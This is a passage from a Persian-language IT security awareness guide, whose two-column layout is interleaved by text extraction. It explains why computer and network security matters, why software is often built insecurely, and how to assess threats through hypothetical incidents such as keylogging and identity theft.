‫ﺍﺭﺯﺵ ﺩﺍﺩﻩﻫﺎﻱ ﻓﺮﺩﻱ ‪ -‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺩﻩﻫﺎﻱ ﻓـﺮﺩﻱ‬ ‫•‬
‫ﺍﺭﺯﺵ ﻣﺎﺩﻱ ﭼﻨﺪﺍﻧﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭﻟـﻲ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩﻥ‬
‫ﺁﻧﻬﺎ ﺑﺴﻴﺎﺭ ﺯﻳﺎﻥﺁﻭﺭ ﺑﺎﺷﺪ ﻭ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺩﻭﺑﺎﺭﺓ ﺍﻃﻼﻋـﺎﺕ‬ ‫ﻓﺼﻞ ﺩﻭﻡ‬
‫ﺯﻣﺎﻥ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻻﺯﻡ ﺑﺎﺷﺪ )ﺗﻌـﺎﺭﻳﻒ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺳـﺮﻗﺖ‬ ‫ﺩﺭﻙ ﻣﻔﺎﻫﻴﻢ ﺍﻣﻨﻴﺘﻲ‬
‫ﻫﻮﻳﺖ‪ ٣‬ﺭﺍ ﻣﻮﺭﺩ ﻣﻼﺣﻈﻪ ﻗﺮﺍﺭ ﺩﻫﻴﺪ(‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺗﻬﺪﻳﺪﺍﺕ ﺟﻨﺎﻳﺘﻜﺎﺭﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ -‬ﻫﻤﮕﺎﻡ ﺑﺎ ﭘﻴـﺸﺮﻓﺘﻬﺎﻱ‬ ‫•‬ ‫ﻛﻠﻴﺎﺕ‬


‫ﻓﻨﺎﻭﺭﻱ‪ ،‬ﮔﺮﻭﻫﻲ ﺍﺯ ﺧﺮﺍﺑﻜـﺎﺭﺍﻥ ﻛـﻪ ﺍﺯ ﺩﺯﺩﻱ ﺩﺍﺩﻩﻫـﺎﻱ‬
‫ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺗﺒﻴـﻴﻦ ﺿـﺮﻭﺭﺕ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﻣﻨﻴـﺖ ﻭ ﺣﻔﺎﻇـﺖ ﺍﺯ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺳﻮﺩ ﻣﻲﺑﺮﻧﺪ ﻧﻴﺰ ﺑﻮﺟﻮﺩ ﺁﻣـﺪﻩﺍﻧـﺪ‪ .‬ﺩﺭ ﻣـﻮﺍﺭﺩﻱ‬
‫ﺷﺒﻜﻪ ﻭ ﺭﺍﻳﺎﻧﻪ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﭘﻴﺎﻣﺪﻫﺎﻱ ﻧﻔﻮﺫ‬
‫ﺍﻳﻨﻜﺎﺭ ﺻﺮﻓﹰﺎ ﺑﺮﺍﻱ ﻟﺬﺕ ﻭ ﺳﺮﮔﺮﻣﻲ ﺻﻮﺭﺕ ﻣـﻲﮔﻴـﺮﺩ ﻭ‬
‫ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺍﻗﺪﺍﻣﺎﺕ ﺍﻭﻟﻴﻪ ﺟﻬﺖ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻥ‪ ،‬ﻭ ﻧﻴـﺰ ﭼﻨـﺪ ﺗﻌﺮﻳـﻒ‬
‫ﺑﺮﺧﻲ ﺍﻓﺮﺍﺩ ﻧﻴﺰ ﺗﻨﻬﺎ ﺑﺨﺎﻃﺮ ﺧﻮﺩﻧﻤﺎﻳﻲ ﺩﺭ ﺑﺮﺍﺑﺮ ﺩﻭﺳـﺘﺎﻥ‬
‫ﻓﻨﻲ ﺍﺯ ﻣﺒﺎﺣﺚ ﺍﻣﻨﻴﺘﻲ ﭘﺮﺩﺍﺧﺘـﻪ ﻣـﻲﺷـﻮﺩ‪ .‬ﺗﻌـﺎﺭﻳﻒ ﻛـﺎﻣﻠﺘﺮ ﺩﺭ‬
‫ﺧﻮﺩ ﺩﺳﺖ ﺑﻪ ﭼﻨﻴﻦ ﻛﺎﺭﻫﺎﻳﻲ ﻣـﻲﺯﻧﻨـﺪ؛ ﺍﻣـﺎ ﺩﺭ ﺑﻌـﻀﻲ‬
‫ﺿﻤﻴﻤﻪ ‪ ۱‬ﻫﻤﻴﻦ ﻓﺼﻞ ﻭ ﻧﻴﺰ ﭘﻴﻮﺳﺖ ‪ ۱‬ﻛﺘﺎﺏ ﺫﻛﺮ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﻣــﻮﺍﺭﺩ ﺍﻳﻨﻜــﺎﺭ ﺑــﺮﺍﻱ ﺩﺳــﺘﻴﺎﺑﻲ ﺑــﻪ ﻣﻨــﺎﻓﻊ ﺷﺨــﺼﻲ ﻭ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﺍﻧﺠﺎﻡ ﻣﻲ ﮔﻴﺮﺩ )ﺩﺯﺩﻱ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﻳـﺎ‬
‫ﭼﺮﺍ ﺗﻤﻬﻴﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺿﺮﻭﺭﺕ ﺩﺍﺭﻧﺪ؟‬
‫ﻭﺭﻭﺩ ﺑﻪ ﻣﻌﺎﻣﻼﺕ ﻓﺮﻳﺒﻜﺎﺭﺍﻧﻪ(‪ .‬ﺩﺭ ﺗﻤﺎﻣﻲ ﻣﻮﺍﺭﺩ ﻣـﺬﻛﻮﺭ ﺍﻳـﻦ‬
‫ﺍﺷﺨﺎﺹ ﺑﺎﻋﺚ ﺍﻳﺠﺎﺩ ﺧﺴﺎﺭﺕ ﻭ ﮔﺴﺘﺮﺵ ﺑﻲﺍﻋﺘﻤـﺎﺩﻱ‬ ‫ﺩﺭ ﺍﻭﻟﻴﻦ ﺭﻭﺯﻫﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ‬
‫ﻣﻲﺷﻮﻧﺪ ﻭ ﺩﺭ ﺣﺪ ﮔﺴﺘﺮﺩﻩﺗﺮ ﻣﺸﻜﻼﺕ ﺑﺤﺮﺍﻧـﻲ ﺑﻮﺟـﻮﺩ‬ ‫ﮔﺬﺍﺷﺘﻪﺷﺪﻩ ﺗﻨﻬﺎ ﺍﺯ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓـﺮﺍﺩ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﺁﻭﺭﻧﺪ ﻛﻪ ﺑﻪ ﺍﺷﺨﺎﺹ ﻭ ﻣﻮﻗﻌﻴﺘﻬـﺎﻱ ﺷـﻐﻠﻲ ﺻـﺪﻣﻪ‬ ‫ﻣﻲﺷﺪ ﻭ ﻧﻴﺎﺯﻱ ﺑﻪ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﻧﺒـﻮﺩ‪ .‬ﺑﻌـﺪ ﺍﺯ ﺁﻧﻜـﻪ‬
‫ﻭﺍﺭﺩ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺎﻳﺪ ﮔﻔﺖ ﺍﺯ ﺯﻣﺎﻧﻲ ﻛﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﻣﻘﻴﺎﺱ‬ ‫ﻛﺎﺭﺑﺮﺍﻥ ﺑﺪﺧﻮﺍﻩ ﺁﻏﺎﺯ ﺑﻪ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ ﻛﺮﺩﻧـﺪ‬
‫ﺟﻬﺎﻧﻲ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ‪ ،‬ﺗﻌﻘﻴﺐ ﻭ ﻣﺘﻮﻗـﻒ‬ ‫ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻧﻴـﺰ ﺑـﻪ ﺁﻥ ﺳﻴـﺴﺘﻤﻬﺎ ﺍﺿـﺎﻓﻪ ﺷـﺪﻧﺪ‪ .‬ﺍﻣـﺮﻭﺯﻩ‬
‫ﻛﺮﺩﻥ ﻣﻬﺎﺟﻤﻴﻦ ﻫﺮﭼﻨﺪ ﻫﻤﭽﻨﺎﻥ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ ﻣـﻲﺑﺎﺷـﺪ‬ ‫ﺭﺍﻫﺒﺮﺍﻥ ﺑﻴﺶ ﺍﺯ ﻫﺮ ﺯﻣﺎﻥ ﺩﻳﮕﺮ ﺑﺎﻳﺪ ﺑﻪ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﻭ ﺭﺍﻳﺎﻧﻪﻫﺎ‬
‫ﻭﻟﻲ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬ ‫ﺑﻴﺎﻧﺪﻳﺸﻨﺪ‪ .‬ﻣﻬﻤﺘﺮﻳﻦ ﺩﻻﻳﻞ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﺍﺭﺯﺵ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺭﻭﻱ ﺗﺠﻬﻴـﺰﺍﺕ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ ﻭ‬ ‫•‬
‫ﻻ ﺩﺭ ﺑﻌﺪ ﺍﻣﻨﻴﺖ ﺿﻌﻒ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫ﭼﺮﺍ ﻣﻌﻤﻮ ﹰ‬ ‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ‪ -‬ﻧﻜﺘﺔ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛـﻪ‬
‫ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﻏﺎﻟﺒﹰﺎ ﺑﺪﻭﻥ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ‬ ‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺑﺴﻴﺎﺭ ﮔﺮﺍﻧﻘﻴﻤﺖ ﻫﺴﺘﻨﺪ‬
‫ﺗﻮﻟﻴﺪ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﭼﻨﺪ ﺩﻟﻴﻞ ﺩﺍﺭﺩ‪:‬‬ ‫ﻭ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺁﻧﻬﺎ ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ‪ .‬ﺣﺘـﻲ ﺍﮔـﺮ ﺩﺭ‬
‫ﻼ ﺍﺯ‬
‫ﻳﻚ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺳﺨﺖﺍﻓﺰﺍﺭﻫـﺎ ﻛـﺎﻣ ﹰ‬
‫ﺳﻬﻞﺍﻧﮕـﺎﺭﻱ ‪ -‬ﺑﺮﻧﺎﻣـﻪﻧﻮﻳـﺴﺎﻥ ﻭ ﻃﺮﺍﺣـﺎﻥ ﺍﺯ ﺍﻫﻤﻴـﺖ‬ ‫•‬
‫ﺑﻴﻦ ﻧﺮﻭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻣﺎ ﺭﺍ ﻭﺍﺩﺍﺭ ﺑـﻪ‬
‫ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺍﻃﻼﻋﻲ ﻧﺪﺍﺭﻧﺪ‪.‬‬
‫ﻧﺼﺐ ﻣﺠﺪﺩ ﻫﻤﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻛﻨﻨﺪ ﻭ ﻣﺘﻌﺎﻗﺒـﹰﺎ ﻻﺯﻡ ﺷـﻮﺩ‬
‫ﺍﻭﻟﻮﻳﺖ ﭘﺎﻳﻴﻦ ‪ -‬ﺗﺎ ﭼﻨﺪﻱ ﻗﺒﻞ ﺣﺘﻲ ﻛﺴﺎﻧﻲ ﻛﻪ ﻧـﺴﺒﺖ‬ ‫•‬ ‫ﻛﻠﻴﺔ ﻧﻴﺎﺯﻫﺎﻱ ﺍﺳﺎﺳﻲ ﻣﺠﺪﺩﹰﺍ ﺗﻌﺮﻳـﻒ ﮔﺮﺩﻧـﺪ‪ .‬ﺍﻳـﻦ ﺍﻣـﺮ‬
‫ﺑﻪ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺁﮔـﺎﻫﻲ ﺩﺍﺷـﺘﻨﺪ ﻧـﺴﺒﺖ ﺑـﻪ ﺁﻥ ﺍﻗـﺪﺍﻡ‬ ‫ﻣﺴﺘﻠﺰﻡ ﺻﺮﻑ ﺯﻣﺎﻥ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺍﺳﺖ؛ ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ‬
‫ﭼﻨﺪﺍﻧﻲ ﻧﻤﻲﻛﺮﺩﻧﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻣﻮﺭﺩ ﺗﻮﺟﻪ‬ ‫ﻓﺮﺩ ﻣﺴﺌﻮﻝ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﻓﻨﻲ ﻛﺎﻓﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻧﺪﺍﺷـﺘﻪ‬
‫ﻻﺯﻡ ﻭﺍﻗﻊ ﻧﻤﻲﺷﺪ‪.‬‬ ‫ﺑﺎﺷﺪ‪.‬‬
‫ﺍﺭﺯﺵ ﺩﺍﺩﻩ ﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ‪ -‬ﺍﻳﻦ ﺩﺍﺩﻩ ﻫـﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬ ‫•‬
‫ﺷــﺎﻣﻞ ﻟﻴــﺴﺖ ﻣــﺸﺘﺮﻱﻫــﺎ‪ ،‬ﭘــﺮﻭﮊﻩﻫــﺎﻱ ﻣــﺎﻟﻲ ﻭ ﻳــﺎ‬

‫‪3‬‬ ‫‪Identity Theft‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٥٠‬‬

‫ﻭﺏ ﺍﻧﺠﺎﻡ ﺧﺮﻳﺪﻫﺎﻱ ﺑﺮﺧﻂ‪ ،٤‬ﮔﺰﺍﺭﺷﻬﺎﻱ ﻛﺎﺭﻱ ﻣﻬﻢ ﻭ ﺗﻜﺎﻟﻴﻒ‬ ‫ﻣﺤﺪﻭﺩﻳﺖ ﺯﻣﺎﻥ ﻭ ﻫﺰﻳﻨﻪ ‪ -‬ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﺗﺼﻮﺭ ﻣﻲ ﻛﻨﻨﺪ‬ ‫•‬
‫ﺩﺭﺳﻲ ﻛﻪ ﺍﺭﺯﺵ ﺁﻧﻬﺎ ﻣﻌﺎﺩﻝ ‪ %۵۰‬ﻧﻤﺮﺍﺕ ﺩﺭﺳﻬﺎﻱ ﺗﺮﻡ ﺟـﺎﺭﻱ‬ ‫ﺍﻗﺪﺍﻣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺟﻬﺖ ﻃﺮﺍﺣﻲ‪ ،‬ﻛﺪ ﻧﻮﻳﺴﻲ ﻭ ﺁﺯﻣﺎﻳﺶ ﺩﺭ‬
‫ﺷﻤﺎ ﺍﺳﺖ‪.‬‬ ‫ﻃﻮﻝ ﻓﺮﺁﻳﻨﺪ ﺗﻮﻟﻴﺪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻫﺰﻳﻨﺔ ﮔﺰﺍﻓﻲ ﺩﺭ ﺑﺮ ﺩﺍﺷـﺘﻪ ﻭ‬
‫ﺯﻣﺎﻥ ﺯﻳﺎﺩﻱ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ‪.‬‬
‫‪...‬ﺷﺨﺼﻲ ﻟﺤﻈﻪ ﺑﻪ ﻟﺤﻈﻪ ﻫﺮ ﺁﻧﭽﻪ ﺭﺍ ﻛﻪ ﺷﻤﺎ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﺩﻫﻴﺪ ﻣﺸﺎﻫﺪﻩ ﻛﻨﺪ ﻭ ﺑﻪ ﺧﺎﻃﺮ ﺑﺴﭙﺎﺭﺩ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ‬ ‫ﺑــﻲﻧﻈﻤــﻲ ﺑﺮﻧﺎﻣــﻪﻧﻮﻳــﺴﺎﻥ ‪ -‬ﺩﺭ ﻛﺎﺭﻫــﺎﻱ ﻣﺮﺑــﻮﻁ ﺑــﻪ‬ ‫•‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻣﻲﻛﻨﻴﺪ ﺍﺯ ﺁﻥ ﺁﮔﺎﻩ ﺷﻮﺩ‪ ،‬ﺍﺯ ﮔﺸﺖ ﻭ ﮔـﺬﺍﺭ‬ ‫ﺑﺮﻧﺎﻣــﻪﻧﻮﻳــﺴﻲ ﺍﺷــﺘﺒﺎﻫﺎﺕ ﻣــﺸﺎﺑﻪ ﭼﻨــﺪﻳﻦ ﺑــﺎﺭ ﺗﻜــﺮﺍﺭ‬
‫ﺷﻤﺎ ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﺨﺘﻠـﻒ ﻣﻄﻠـﻊ ﺑﺎﺷـﺪ‪ ،‬ﻭ ﺯﻣﺎﻧﻴﻜـﻪ ﺑـﺎ‬ ‫ﻣﻲﺷﻮﻧﺪ ﻭ ﺑﺎﻋﺚ ﺍﻳﺠﺎﺩ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﻣﻲﮔﺮﺩﻧﺪ‪.‬‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻳﺎ ﺳﻴـﺴﺘﻤﻬﺎ ﺍﺭﺗﺒـﺎﻁ ﺑﺮﻗـﺮﺍﺭ ﻣـﻲﻛﻨﻴـﺪ ﺑﺘﻮﺍﻧـﺪ ﻧـﺎﻡ‬ ‫ﺧﻼﻗﻴﺖ ﺗﺒﻬﻜﺎﺭﺍﻥ ‪ -‬ﺍﻧﺴﺎﻥ ﻣﻮﺟﻮﺩ ﺧﻼﻗﻲ ﺍﺳﺖ ﻭ ﺍﻓﺮﺍﺩ‬ ‫•‬
‫ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ‪.‬‬ ‫ﺑﺎﺍﻧﮕﻴﺰﻩ ﻫﻤﻴﺸﻪ ﺑﺮﺍﻱ ﻏﻠﺒﻪ ﺑﺮ ﻣﻮﺍﻧـﻊ ﺍﻣﻨﻴﺘـﻲ ﻭ ﻛـﺸﻒ‬
‫‪...‬ﻫﻨﮕﺎﻣﻴﻜﻪ ﺭﻭﻱ ﻳﻚ ﭘﺮﻭﮊﺓ ﻣﻬﻢ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﻭ ﺯﻣـﺎﻥ ﺩﺭ ﺁﻥ‬ ‫ﺍﺷﺘﺒﺎﻫﺎﺗﻲ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﺷﻮﻧﺪ ﺭﺍﻫﻲ ﭘﻴـﺪﺍ‬
‫ﻧﻘﺶ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﺩﺍﺭﺩ‪ ،‬ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﮔﺮﺩﺩ‪.‬‬ ‫ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ‪.‬‬
‫‪...‬ﻳﻚ ﻭﻳﺮﻭﺱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺨﺮﺏ ﺑﻪ ﻫﻤﻪ ﺩﻭﺳﺘﺎﻧﺘﺎﻥ ﻛﻪ ﻧﺎﻡ ﺁﻧﻬﺎ‬ ‫ﺳﻄﺢ ﭘﺎﻳﻴﻦ ﺁﮔﺎﻫﻲ ﻛﺎﺭﺑﺮﺍﻥ ‪ -‬ﻛﺎﺭﺑﺮﺍﻥ ﻣﻌﻤﻮﻟﻲ )ﻗﺮﺑﺎﻧﻴﺎﻥ‬ ‫•‬
‫ﺩﺭ ﺩﻓﺘﺮﭼﺔ ﺁﺩﺭﺳﻬﺎﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺛﺒﺖ ﺷﺪﻩ ﺍﺭﺳﺎﻝ ﺷﻮﺩ‪.‬‬ ‫ﺗﺨﻠﻔﺎﺕ ﺍﻣﻨﻴﺘﻲ( ﺑﻄﻮﺭ ﻃﺒﻴﻌﻲ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺍﻃـﺮﺍﻑ ﺧـﻮﺩ‬
‫ﺁﮔﺎﻫﻲ ﻧﺪﺍﺭﻧﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺭ ﭘﻲ ﺭﺍﻫﻬﺎﻱ ﻣﻨﺎﺳـﺐ‬
‫‪...‬ﻭﻗﺘﻲ ﺻﻮﺭﺗﺤﺴﺎﺏ ﺗﻠﻔﻦ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﺮﺩﻳﺪ ﻣﻼﺣﻈﻪ ﻛﻨﻴﺪ ﻛـﻪ‬
‫ﺟﻬﺖ ﺗﻀﻤﻴﻦ ﺍﻣﻨﻴﺖ ﺩﺍﺩﻩﻫﺎ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﻣﺒﻠﻎ ﺁﻥ ﺣﺘﻲ ﺍﺯ ﺣﻘﻮﻕ ﻣﺎﻫﻴﺎﻧﺔ ﺷﻤﺎ ﻫﻢ ﺑﻴﺸﺘﺮ ﺍﺳﺖ ﻭ ﺍﻳـﻦ ﺩﺭ‬
‫ﺷﺮﺍﻳﻄﻲ ﺍﺳﺖ ﻛﻪ ﻣﻄﻤـﺌﻦ ﻫـﺴﺘﻴﺪ ﺑـﻪ ﺍﻳـﻦ ﻣﻴـﺰﺍﻥ ﺍﺯ ﺗﻠﻔـﻦ‬ ‫ﻧﮕﺎﻩ ﻏﻴﺮﻭﺍﻗﻌﻲ ﻗﺮﺑﺎﻧﻴﺎﻥ ‪ -‬ﺑﺮﺧـﻲ ﻛـﺎﺭﺑﺮﺍﻥ ﻧـﺴﺒﺖ ﺑـﻪ‬ ‫•‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﺮﺩﻩﺍﻳﺪ‪.‬‬ ‫ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧﺪ ﻭﻟﻲ ﺁﻧﻬﺎ ﺭﺍ ﺟﺪﻱ ﻧﻤﻲﮔﻴﺮﻧﺪ؛‬
‫ﭼﻮﻥ ﮔﻤﺎﻥ ﻣﻲﻛﻨﻨﺪ ﻛـﻪ ﺣﻤﻠـﻪﺍﻱ ﻋﻠﻴـﻪ ﺁﻧﻬـﺎ ﺻـﻮﺭﺕ‬
‫‪...‬ﻳﻚ ﺻﻮﺭﺗﺤﺴﺎﺏ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺮﺍﻱ ﺷـﻤﺎ ﺍﺭﺳـﺎﻝ ﺷـﻮﺩ ﻭ‬
‫ﻧﺨﻮﺍﻫﺪ ﮔﺮﻓﺖ‪.‬‬
‫ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ ﻛﻪ ﺍﻳﻦ ﺻﻮﺭﺗﺤﺴﺎﺏ ﺷـﻤﺎ ﻧﻴـﺴﺖ؛ ﻭﻟـﻲ ﺑﺎﻧـﻚ‬
‫ﺳﻌﻲ ﺩﺍﺭﺩ ﺷﻤﺎ ﺭﺍ ﻣﺘﻘﺎﻋﺪ ﻛﻨﺪ ﻛﻪ ﺑﻪ ﺍﻳﻦ ﻣﻴﺰﺍﻥ ﺍﺯ ﻛـﺎﺭﺕ ﺧـﻮﺩ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺗﻬﺪﻳﺪﺍﺕ ﻭ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺁﻧﻬﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩﻩﺍﻳﺪ ﻭ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺪﻋﺎ ﺩﻟﻴﻞ ﻫﻢ ﺩﺍﺭﺩ‪.‬‬
‫ﺟﻬﺖ ﺩﺭﻙ ﺍﻫﻤﻴﺖ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻻﺯﻡ ﺍﺳـﺖ ﺑـﻪ ﭼﻨـﺪ ﺳـﺆﺍﻝ‬
‫ﺳﺆﺍﻻﺕ ﻛﻠﻴﺪﻱ ﻛﻪ ﺩﺭ ﻫﺮ ﻣﻮﺭﺩ ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﭘﺎﺳﺦ ﺩﺍﺩﻩ ﺷﻮﺩ ﺑﻪ‬
‫ﭘﺎﺳﺦ ﺩﺍﺩﻩ ﺷﻮﺩ‪ .‬ﺍﺑﺘﺪﺍ ﻓﺮﺽ ﻛﻨﻴـﺪ ﻣـﺴﺎﺋﻞ ﺯﻳـﺮ ﺍﺗﻔـﺎﻕ ﺍﻓﺘـﺎﺩﻩ‬
‫ﺷﺮﺡ ﺯﻳﺮ ﻫﺴﺘﻨﺪ‪:‬‬
‫ﺑﺎﺷﻨﺪ ﻭ ﺳﭙﺲ ﺳﻌﻲ ﻛﻨﻴﺪ ﻧﺘـﺎﻳﺞ ﺍﺣﺘﻤـﺎﻟﻲ ﻫﺮﻳـﻚ ﺭﺍ ﺍﺭﺯﻳـﺎﺑﻲ‬
‫ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ‪ ،‬ﺁﻳﺎ ﺍﻣﻜﺎﻥ ﺗﺮﻣﻴﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬ ‫•‬ ‫ﻧﻤﺎﻳﻴﺪ ﻭ ﺩﺭ ﻫﺮ ﻣﻮﺭﺩ ﺑـﻪ ﭼﻨـﺪ ﺳـﺆﺍﻝ ﻛﻠﻴـﺪﻱ ﻛـﻪ ﺩﺭ ﺍﺑﺘـﺪﺍﻱ‬
‫ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﭼﻘﺪﺭ ﺯﻣﺎﻥ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ؟‬ ‫•‬ ‫ﺻﻔﺤﻪ ﺑﻌﺪﻱ ﺁﻣﺪﻩ ﭘﺎﺳﺦ ﺩﻫﻴﺪ‪.‬‬
‫ﭼﻪ ﻣﻘﺪﺍﺭ ﻫﺰﻳﻨﻪ ﺻﺮﻑ ﺁﻥ ﻣﻲﺷﻮﺩ؟‬ ‫•‬
‫ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﺧﻮﺍﻫﺪ ﺍﻓﺘﺎﺩ ﺍﮔﺮ‪...‬‬
‫ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺭﺍ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗﺮﺍﺭ ﺩﻫﺪ؟‬ ‫•‬
‫ﭼﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺟﺎﻧﺒﻲ ﺩﺭ ﺑﺮ ﺩﺍﺭﺩ؟ )ﻣﺜ ﹰ‬
